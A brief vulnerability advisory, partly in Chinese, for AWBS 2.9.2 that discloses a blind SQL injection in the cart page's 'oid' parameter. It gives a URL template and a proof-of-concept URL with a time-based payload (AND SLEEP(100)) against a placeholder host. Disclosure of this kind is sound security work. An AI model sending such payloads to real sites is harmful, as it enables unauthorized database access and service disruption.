影响版本:AWBS 2.9.2
官方网站:http://www.awbs.com
漏洞描述:
—Vulnerability—
http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]\'[BLIND-SQL]
=============================================================================================
—PoC Using Time-Based Blind SQL Injection—
https://www.vulnerablehost.com/cart?ca=add_other&oid=1\’%20AND%20SLEEP(100)=\’